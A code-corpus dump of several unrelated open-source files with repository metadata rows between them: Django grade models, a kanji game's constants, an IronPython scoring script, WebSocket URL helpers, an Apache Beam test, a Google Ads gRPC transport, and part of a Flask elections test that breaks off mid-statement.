params['visible_blocks'] = BlockRecordList.from_list(params['visible_blocks'], params['course_id'])
@classmethod
def _prepare_params_visible_blocks_id(cls, params):
"""
Prepares the visible_blocks_id field for the grade record,
using the hash of the visible_blocks field. Specifying
the hashed field eliminates extra queries to get the
VisibleBlocks record. Use this variation of preparing
the params when you are sure of the existence of the
VisibleBlock.
"""
params['visible_blocks_id'] = params['visible_blocks'].hash_value
del params['visible_blocks']
@staticmethod
def _emit_grade_calculated_event(grade):
events.subsection_grade_calculated(grade)
@classmethod
def _cache_key(cls, course_id):
return f"subsection_grades_cache.{course_id}"
@python_2_unicode_compatible
class PersistentCourseGrade(TimeStampedModel):
"""
A django model tracking persistent course grades.
.. no_pii:
"""
class Meta:
app_label = "grades"
# Indices:
# (course_id, user_id) for individual grades
# (course_id) for instructors to see all course grades, implicitly created via the unique_together constraint
# (user_id) for course dashboard; explicitly declared as an index below
# (passed_timestamp, course_id) for tracking when users first earned a passing grade.
# (modified): find all the grades updated within a certain timespan
# (modified, course_id): find all the grades updated within a certain timespan for a course
unique_together = [
('course_id', 'user_id'),
]
index_together = [
('passed_timestamp', 'course_id'),
('modified', 'course_id')
]
# primary key will need to be large for this table
id = UnsignedBigIntAutoField(primary_key=True) # pylint: disable=invalid-name
user_id = models.IntegerField(blank=False, db_index=True)
course_id = CourseKeyField(blank=False, max_length=255)
# Information relating to the state of content when grade was calculated
course_edited_timestamp = models.DateTimeField('Last content edit timestamp', blank=True, null=True)
course_version = models.CharField('Course content version identifier', blank=True, max_length=255)
grading_policy_hash = models.CharField('Hash of grading policy', blank=False, max_length=255)
# Information about the course grade itself
percent_grade = models.FloatField(blank=False)
letter_grade = models.CharField('Letter grade for course', blank=False, max_length=255)
# Information related to course completion
passed_timestamp = models.DateTimeField('Date learner earned a passing grade', blank=True, null=True)
_CACHE_NAMESPACE = "grades.models.PersistentCourseGrade"
def __str__(self):
"""
Returns a string representation of this model.
"""
return ', '.join([
"{} user: {}".format(type(self).__name__, self.user_id),
f"course version: {self.course_version}",
f"grading policy: {self.grading_policy_hash}",
f"percent grade: {self.percent_grade}%",
f"letter grade: {self.letter_grade}",
f"passed timestamp: {self.passed_timestamp}",
])
@classmethod
def prefetch(cls, course_id, users):
"""
Prefetches grades for the given users for the given course.
"""
get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(course_id)] = {
grade.user_id: grade
for grade in
cls.objects.filter(user_id__in=[user.id for user in users], course_id=course_id)
}
@classmethod
def clear_prefetched_data(cls, course_key):
"""
Clears prefetched grades for this course from the RequestCache.
"""
get_cache(cls._CACHE_NAMESPACE).pop(cls._cache_key(course_key), None)
@classmethod
def read(cls, user_id, course_id):
"""
Reads a grade from database
Arguments:
user_id: The user associated with the desired grade
course_id: The id of the course associated with the desired grade
Raises PersistentCourseGrade.DoesNotExist if applicable
"""
try:
prefetched_grades = get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(course_id)]
try:
return prefetched_grades[user_id]
except KeyError:
# user's grade is not in the prefetched dict, so
# assume they have no grade
raise cls.DoesNotExist # lint-amnesty, pylint: disable=raise-missing-from
except KeyError:
# grades were not prefetched for the course, so fetch it
return cls.objects.get(user_id=user_id, course_id=course_id)
@classmethod
def update_or_create(cls, user_id, course_id, **kwargs):
"""
Creates a course grade in the database.
Returns a PersistedCourseGrade object.
"""
passed = kwargs.pop('passed')
if kwargs.get('course_version', None) is None:
kwargs['course_version'] = ""
grade, _ = cls.objects.update_or_create(
user_id=user_id,
course_id=course_id,
defaults=kwargs
)
if passed and not grade.passed_timestamp:
grade.passed_timestamp = now()
grade.save()
cls._emit_grade_calculated_event(grade)
cls._update_cache(course_id, user_id, grade)
return grade
@classmethod
def _update_cache(cls, course_id, user_id, grade):
course_cache = get_cache(cls._CACHE_NAMESPACE).get(cls._cache_key(course_id))
if course_cache is not None:
course_cache[user_id] = grade
@classmethod
def _cache_key(cls, course_id):
return f"grades_cache.{course_id}"
@staticmethod
def _emit_grade_calculated_event(grade):
events.course_grade_calculated(grade)
@python_2_unicode_compatible
class PersistentSubsectionGradeOverride(models.Model):
"""
A django model tracking persistent grades overrides at the subsection level.
.. no_pii:
"""
class Meta:
app_label = "grades"
grade = models.OneToOneField(PersistentSubsectionGrade, related_name='override', on_delete=models.CASCADE)
# Created/modified timestamps prevent race-conditions when using with async rescoring tasks
created = models.DateTimeField(auto_now_add=True, db_index=True)
modified = models.DateTimeField(auto_now=True, db_index=True)
# earned/possible refers to the number of points achieved and available to achieve.
# graded refers to the subset of all problems that are marked as being graded.
earned_all_override = models.FloatField(null=True, blank=True)
possible_all_override = models.FloatField(null=True, blank=True)
earned_graded_override = models.FloatField(null=True, blank=True)
possible_graded_override = models.FloatField(null=True, blank=True)
# store the source of the system that caused the override
system = models.CharField(max_length=100, blank=True, null=True)
# store the reason for the override
override_reason = models.CharField(max_length=300, blank=True, null=True)
_CACHE_NAMESPACE = "grades.models.PersistentSubsectionGradeOverride"
# This is necessary because CMS does not install the grades app, but it
# imports this models code. Simple History will attempt to connect to the installed
# model in the grades app, which will fail.
if 'grades' in apps.app_configs:
history = HistoricalRecords()
_history_user = None
def __str__(self):
return ', '.join([
"{}".format(type(self).__name__),
f"earned_all_override: {self.earned_all_override}",
f"possible_all_override: {self.possible_all_override}",
f"earned_graded_override: {self.earned_graded_override}",
f"possible_graded_override: {self.possible_graded_override}",
])
def get_history(self):
return self.history.all() # pylint: disable=no-member
@classmethod
def prefetch(cls, user_id, course_key):
get_cache(cls._CACHE_NAMESPACE)[(user_id, str(course_key))] = {
override.grade.usage_key: override
for override in
cls.objects.filter(grade__user_id=user_id, grade__course_id=course_key)
}
@classmethod
def get_override(cls, user_id, usage_key): # lint-amnesty, pylint: disable=missing-function-docstring
prefetch_values = get_cache(cls._CACHE_NAMESPACE).get((user_id, str(usage_key.course_key)), None)
if prefetch_values is not None:
return prefetch_values.get(usage_key)
try:
return cls.objects.get(
grade__user_id=user_id,
grade__course_id=usage_key.course_key,
grade__usage_key=usage_key,
)
except PersistentSubsectionGradeOverride.DoesNotExist:
pass
@classmethod
def update_or_create_override(
cls, requesting_user, subsection_grade_model, feature=None, action=None, **override_data # lint-amnesty, pylint: disable=unused-argument
):
"""
Creates or updates an override object for the given PersistentSubsectionGrade.
Args:
requesting_user: The user that is creating the override.
subsection_grade_model: The PersistentSubsectionGrade object associated with this override.
override_data: The parameters of score values used to create the override record.
"""
grade_defaults = cls._prepare_override_params(subsection_grade_model, override_data)
grade_defaults['override_reason'] = override_data['comment'] if 'comment' in override_data else None
grade_defaults['system'] = override_data['system'] if 'system' in override_data else None
# TODO: Remove as part of EDUCATOR-4602.
if str(subsection_grade_model.course_id) == 'course-v1:UQx+BUSLEAD5x+2T2019':
log.info('Creating override for user ***{}*** for PersistentSubsectionGrade'
'***{}*** with override data ***{}*** and derived grade_defaults ***{}***.'
.format(requesting_user, subsection_grade_model, override_data, grade_defaults))
try:
override = PersistentSubsectionGradeOverride.objects.get(grade=subsection_grade_model)
for key, value in grade_defaults.items():
setattr(override, key, value)
except PersistentSubsectionGradeOverride.DoesNotExist:
override = PersistentSubsectionGradeOverride(grade=subsection_grade_model, **grade_defaults)
if requesting_user:
# setting this on a non-field attribute which simple
# history reads from to determine which user to attach to
# the history row
override._history_user = requesting_user # pylint: disable=protected-access
override.save()
return override
@staticmethod
def _prepare_override_params(subsection_grade_model, override_data):
"""
Helper method to strip any grade override field names that won't work
as defaults when calling PersistentSubsectionGradeOverride.update_or_create(),
and to use default values from the associated PersistentSubsectionGrade
for any override fields that are not specified.
"""
allowed_fields_and_defaults = {
'earned_all_override': 'earned_all',
'possible_all_override': 'possible_all',
'earned_graded_override': 'earned_graded',
'possible_graded_override': 'possible_graded',
}
cleaned_data = {}
for override_field_name, field_name in allowed_fields_and_defaults.items():
cleaned_data[override_field_name] = override_data.get(
override_field_name,
getattr(subsection_grade_model, field_name)
)
return cleaned_data
| agpl-3.0 | -3,658,550,487,341,594,600 | 39.002597 | 145 | 0.635218 | false |
josephnavarro/kanji-radical-reading | constant.py | 1 | 3287 | #!usr/bin/env python
import os
## Constants
## Constant values used in other files
TITLE = "Kanji by Radical" ## Window caption
SIZE = W,H = 800,600 ## Screen size
SMALL = W*2//3, H*2//3 ## Small screen
FPS = 60 ## Screen refresh rate
FONTSIZE = 108
BLACK = (0,0,0)
RED = (255,0,0)
WHITE = (255,255,255)
ANGLE = 3.75
SCALE = 1.5
MINISCALE = 0.8
KANJISIZE = 128,128
WORD_LONG = 8
## Font sizes
TEXT_LG = 90
TEXT_MD = 40
TEXT_DF = 40
TEXT_DD = 35
TEXT_SM = 36
DEF_ANGLE = -6
## GUI button placement
KANJI_VERT = [H//4 for n in range(2)]
KANJI_HORZ = [32+W*3//18, 32+W*8//18]
MAIN_BUTTON_HORZ = [64, W//2 + 64]
MAIN_BUTTON_VERT = [H//2 + 64 for n in range(2)]
BUTTON_HORZ = [480 for n in range(3)] ## Button y-coordinates
BUTTON_VERT = [32 + 176 * n for n in range(3)] ## Button x-coordinates
## Finite state machine game modes
MODE_TITLE = 'title' ## Game title screen
MODE_STAGE = 'select' ## Game stage selection
MODE_INTERMEDIATE = 'intermediate'
## Different types of game modes
MODE_ONYOMI = 'onyomi' ## On'yomi given (choose radical)
MODE_RADICAL = 'radical' ## Radical given (choose on'yomi)
## Vertical pixel offset when a button is pressed
OFFSET_Y = 120
PRESS_X = 8
PRESS_Y = 8
## Folder hierarchy
DIR_ROOT = 'res'
DIR_FONT = 'font'
DIR_IMG = 'img'
DIR_KANJI = 'kanji'
DIR_RADICAL = 'radical'
DIR_BASE = 'base'
DIR_DATA = 'data'
DIR_SOUND = 'snd'
## Files
FILE_BASE = 'base.config'
FILE_DEFINITION = 'definition.config'
FILE_TITLE = 'title.png'
BUTTON_IMG1A = 'button1a.png'
BUTTON_IMG1B = 'button1b.png'
BUTTON_IMG2A = 'button2a.png'
BUTTON_IMG2B = 'button2b.png'
BUTTON_IMG3A = 'button3a.png'
BUTTON_IMG3B = 'button3b.png'
BUTTON_IMG4A = 'button4a.png'
BUTTON_IMG4B = 'button4b.png'
DAGGER_IMG = 'dagger.png'
CHAR_KAN = 'kan.png'
CHAR_KEN = 'ken.png'
CHAR_SEI = 'sei.png'
GAME_BACKGROUND1 = 'game1.png'
GAME_BACKGROUND2 = 'game2.png'
ICONFILE = 'icon.png'
BGM_FILE = 'bgm.ogg'
SFX1_FILE = 'sfx1.ogg'
SFX2_FILE = 'sfx2.ogg'
## Parser delimiters
DASH = '-'
FILE = '.'
SPACE = '_'
COLON = ':'
COMMA = ','
PNGWILD = '/*.png'
## Image paths
BGPATH1 = os.path.join(DIR_ROOT, DIR_IMG, GAME_BACKGROUND1)
BGPATH2 = os.path.join(DIR_ROOT, DIR_IMG, GAME_BACKGROUND2)
BGM_PATH = os.path.join(DIR_ROOT, DIR_SOUND, BGM_FILE)
SFX1_PATH = os.path.join(DIR_ROOT, DIR_SOUND, SFX1_FILE)
SFX2_PATH = os.path.join(DIR_ROOT, DIR_SOUND, SFX2_FILE)
ICONPATH = os.path.join(DIR_ROOT, DIR_IMG, ICONFILE)
DGPATH = os.path.join(DIR_ROOT, DIR_IMG, DAGGER_IMG)
BTNPATH1 = [
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG3A),
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG3B),
]
BTNPATH2 = [
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG4A),
os.path.join(DIR_ROOT, DIR_IMG, BUTTON_IMG4B),
]
KANPATH = os.path.join(DIR_ROOT, DIR_RADICAL, CHAR_KAN)
KENPATH = os.path.join(DIR_ROOT, DIR_RADICAL, CHAR_KEN)
SEIPATH = os.path.join(DIR_ROOT, DIR_RADICAL, CHAR_SEI)
## Dagger animation constants
START_POS = [
]
## Dictionary keys
KEY_NONE = 'none'
KEY_FULL = 'full'
KEY_OTHER = 'other'
| mit | 3,822,552,664,235,857,400 | 26.165289 | 75 | 0.613021 | false |
manologomez/Vulcano | support/calculo_redes.py | 1 | 2923 | # -*- coding: utf-8 -*-
import sys
import re
import clr
from utilidades import *
from System import DateTime, Guid
from Vulcano.Engine import *#RepoGeneral, AppNotifier
from Vulcano.App import *
def evaluar_script(code, val, _data):
data = _data
hoy = DateTime.Now
return eval(code)
def match_valor(var, valor, data):
e = cadena(valor)
for pos in var.Valores:
if var.EsScript:
if evaluar_script(pos.Expresion, valor, data):
return pos.Puntajes
else:
for p in pos.Expresion.split(','):
if e == p: return pos.Puntajes
return None
def especial_por(valor):
numero = getNumero(valor)
if numero == None: return None
if numero < 1: numero = numero*100
if numero <= 0: return 'sin servicio'
if numero > 80: return 'alta'
if numero > 50 and numero <= 80: return 'moderada'
if numero < 50: return 'baja'
return None
#sirve lo mismo que catalogos por lo pronto
def transform(valor, var):
txt = valor.strip().lower()
if txt == 'hi': txt = 'ac'
if var.Codigo == 'intervencion':
if txt == 'personal y equipos necesarios': txt = 'alta'
if var.ValorEnPosibles(txt): return txt
for p in var.Valores:
if p.Descripcion.lower() == txt:
return p.Expresion
return None
def correr():
print " A procesar %s" % fuentes.Count
total = 0
for fuente in fuentes:
f = {}
f.update(fuente)
if not proc.MapaFichas.ContainsKey(fuente.Tipo):
continue
#print fuente.Tipo, f
ficha = proc.MapaFichas[fuente.Tipo]
res = proc.CrearResultado(fuente)
data = {}
for var in ficha.Variables.Values:
cod = var.Codigo
data[cod] = None
valor = cadena(f[cod])
if not valor or valor == '': continue
if var.Codigo == "cobertura":
valor = especial_por(f[cod])
else:
valor = transform(valor, var)
data[cod] = valor
completos = 0
for (k,v) in data.iteritems():
det = proc.CrearDetalle(res, "evaluacion", k, cadena(v))
det.Valor_numerico = getNumero(v)
res.AddDetalle(det)
if v == None or v == '':
continue
completos += 1
#calidad
completo = completos / ficha.Variables.Count
det = proc.CrearDetalle(res, "calidad", "num_completos", None)
det.Valor_numerico = completo
res.AddDetalle(det)
res.Completo = completo
#calculo
totales = {}
for (k,v) in data.iteritems():
if v == None: continue
var = ficha.Variables[k]
pond = match_valor(var, v, data)
if not pond: continue
i = 0
for ame in ficha.Temas:
num = pond[i]
po = var.Ponderaciones[i]
i+=1
if num == None or po == None: continue
calc = num * po
det = proc.CrearDetalle(res, ame, k, cadena(v))
det.Valor_numerico = num
det.Calculado = calc
res.AddDetalle(det)
if i not in totales: totales[i] = 0
totales[i] += calc
for (ind, tot) in totales.iteritems():
setattr(res, "Indicador%s" % ind, tot)
resultados.Add(res)
total+=1
if total % 10 == 0:
print "Calculados %s" % total
print "Procesado"
correr()
| mit | 8,565,035,509,269,657,000 | 24.867257 | 64 | 0.656175 | false |
meejah/AutobahnPython | autobahn/websocket/util.py | 1 | 5373 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import six
from six.moves import urllib
# The Python urlparse module currently does not contain the ws/wss
# schemes, so we add those dynamically (which is a hack of course).
# Since the urllib from six.moves does not seem to expose the stuff
# we monkey patch here, we do it manually.
#
# Important: if you change this stuff (you shouldn't), make sure
# _all_ our unit tests for WS URLs succeed
#
if not six.PY3:
# Python 2
import urlparse
else:
# Python 3
from urllib import parse as urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
__all__ = (
"create_url",
"parse_url",
)
def create_url(hostname, port=None, isSecure=False, path=None, params=None):
"""
Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default
ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSocket ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be
properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query
component of the addressed resource (will be properly URL
escaped).
:type params: dict
:returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.parse.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.parse.urlencode(params)
else:
query = None
return urllib.parse.urlunparse((scheme, netloc, ppath, None, query, None))
def parse_url(url):
"""
Parses as WebSocket URL into it's components and returns a tuple (isSecure, host, port, resource, path, params).
- ``isSecure`` is a flag which is True for wss URLs.
- ``host`` is the hostname or IP from the URL.
- ``port`` is the port from the URL or standard port derived from
scheme (ws = 80, wss = 443).
- ``resource`` is the /resource name/ from the URL, the /path/
together with the (optional) /query/ component.
- ``path`` is the /path/ component properly unescaped.
- ``params`` is the /query/ component properly unescaped and
returned as dictionary.
:param url: A valid WebSocket URL, i.e. ``ws://localhost:9000/myresource?param1=23¶m2=456``
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if not parsed.hostname or parsed.hostname == "":
raise Exception("invalid WebSocket URL: missing hostname")
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket URL: bogus protocol scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.parse.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return parsed.scheme == "wss", parsed.hostname, port, resource, path, params
| mit | 3,172,701,543,002,705,000 | 34.582781 | 116 | 0.647869 | false |
iemejia/incubator-beam | sdks/python/apache_beam/dataframe/convert_test.py | 1 | 2180 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import unittest
import pandas as pd
import apache_beam as beam
from apache_beam.dataframe import convert
from apache_beam.testing.util import assert_that
class ConverTest(unittest.TestCase):
def test_convert(self):
def equal_to_unordered_series(expected):
def check(actual):
actual = pd.concat(actual)
if sorted(expected) != sorted(actual):
raise AssertionError(
'Series not equal: \n%s\n%s\n' % (expected, actual))
return check
with beam.Pipeline() as p:
a = pd.Series([1, 2, 3])
b = pd.Series([100, 200, 300])
pc_a = p | 'A' >> beam.Create([a])
pc_b = p | 'B' >> beam.Create([b])
df_a = convert.to_dataframe(pc_a, proxy=a[:0])
df_b = convert.to_dataframe(pc_b, proxy=b[:0])
df_2a = 2 * df_a
df_3a = 3 * df_a
df_ab = df_a * df_b
# Converting multiple results at a time can be more efficient.
pc_2a, pc_ab = convert.to_pcollection(df_2a, df_ab)
# But separate conversions can be done as well.
pc_3a = convert.to_pcollection(df_3a)
assert_that(pc_2a, equal_to_unordered_series(2 * a), label='Check2a')
assert_that(pc_3a, equal_to_unordered_series(3 * a), label='Check3a')
assert_that(pc_ab, equal_to_unordered_series(a * b), label='Checkab')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,303,798,384,914,836,000 | 33.0625 | 75 | 0.672018 | false |
googleads/google-ads-python | google/ads/googleads/v7/services/services/customer_client_service/transports/grpc.py | 1 | 10383 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v7.resources.types import customer_client
from google.ads.googleads.v7.services.types import customer_client_service
from .base import CustomerClientServiceTransport, DEFAULT_CLIENT_INFO
class CustomerClientServiceGrpcTransport(CustomerClientServiceTransport):
"""gRPC backend transport for CustomerClientService.
Service to get clients in a customer's hierarchy.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_customer_client(
self,
) -> Callable[
[customer_client_service.GetCustomerClientRequest],
customer_client.CustomerClient,
]:
r"""Return a callable for the
get customer client
method over gRPC.
Returns the requested client in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetCustomerClientRequest],
~.CustomerClient]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_customer_client" not in self._stubs:
self._stubs["get_customer_client"] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v7.services.CustomerClientService/GetCustomerClient",
request_serializer=customer_client_service.GetCustomerClientRequest.serialize,
response_deserializer=customer_client.CustomerClient.deserialize,
)
return self._stubs["get_customer_client"]
__all__ = ("CustomerClientServiceGrpcTransport",)
| apache-2.0 | 3,458,914,125,503,089,000 | 40.866935 | 94 | 0.605894 | false |
NerdsvilleCEO/elections | tests/test_flask_simple_voting.py | 1 | 9190 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
(c) 2014 - Copyright Pierre-Yves Chibon
Author: Pierre-Yves Chibon <[email protected]>
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2, or (at your option) any later version. This
# program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the GNU
# General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public License and
# may only be used or replicated with the express permission of Red Hat, Inc.
fedora_elections.elections test script
"""
__requires__ = ['SQLAlchemy >= 0.7', 'jinja2 >= 2.4']
import pkg_resources
import logging
import unittest
import sys
import os
from datetime import time
from datetime import timedelta
import flask
sys.path.insert(0, os.path.join(os.path.dirname(
os.path.abspath(__file__)), '..'))
import fedora_elections
from tests import ModelFlasktests, Modeltests, TODAY, FakeUser, user_set
# pylint: disable=R0904
class FlaskSimpleElectionstests(ModelFlasktests):
""" Flask application tests range voting. """
def test_vote_simple(self):
""" Test the vote_simple function - the preview part. """
output = self.app.get(
'/vote/test_election', follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<title>OpenID transaction in progress</title>' in output.data
or 'discoveryfailure' in output.data)
self.setup_db()
user = FakeUser(['packager'], username='toshio')
with user_set(fedora_elections.APP, user):
output = self.app.get(
'/vote/test_election5', follow_redirects=True)
self.assertTrue(
'class="message">You have already voted in the election!</'
in output.data)
user = FakeUser(['packager'], username='pingou')
with user_set(fedora_elections.APP, user):
output = self.app.get(
'/vote/test_election5')
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
# Invalid vote: No candidate
data = {
'action': 'preview',
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
